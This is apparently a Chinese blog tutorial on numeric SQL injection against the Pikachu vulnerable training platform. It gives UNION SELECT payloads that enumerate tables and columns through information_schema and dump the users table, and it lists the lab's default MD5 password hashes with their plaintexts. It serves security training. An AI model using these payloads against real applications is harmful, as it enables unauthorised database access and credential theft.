pikachu漏洞平台sql注入 之 数字型注入

1 .首先分析一下
在这里插入图片描述
在这里插入图片描述
我们这里通过提交 数字获取到查询的邮箱.我们得到的信息是它是一个数字类型的变量
我们想象一下它的代码和查询语句大概是下面这样
i d = id= id=_POST[‘id’] 通过提交的数字赋值给变量ID

select 字段1, 字段2 from 表名 where id = 1; 这是大概的查询语句 这里我们并不知道 两个字段名字 和表名只是知道提交的数字1
2. 判断是否存在注入点
通过burp 抓包
在这里插入图片描述
这里我提交的2 放到重放器里进行重放攻击测试 我这里 -1 测试下 看下图

在这里插入图片描述
通过测试得知是存在注入漏洞的! 下面爆字段列数 如果说确定是数字型 不用闭合也是可以的
在这里插入图片描述

通过函数爆数据库库名和数据库用户
在这里插入图片描述
怼上语句 爆出所有的表 :id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()
联合 选择 连接表名,2 来自 information_schema.tables(是MySQL自带的,它提供了访问数据库 元数据 的方式。什么是 元数据 呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。) 数据库的名字=函数获取 这应该是最差的注释了吧 不过语法确是这么写的
在这里插入图片描述
爆敏感表-users的字段
id=1 union select group_concat(column_name),2 from information_schema.columns where table_name=‘users’
上面获取到了users
在这里插入图片描述

在这里插入图片描述

获取username和password的数据
id=1 union select username,password from users#
知道了 表的名字 就可以从中获取 password 和username 里面就是账号和密码
在这里插入图片描述

MD5 解密下:

admin:e10adc3949ba59abbe56e057f20f883e(123456)
pikachu:670b14728ad9902aecba32e22fa4f6bd(000000)
test:e99a18c428cb38d5f260853678922e03(abc123)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值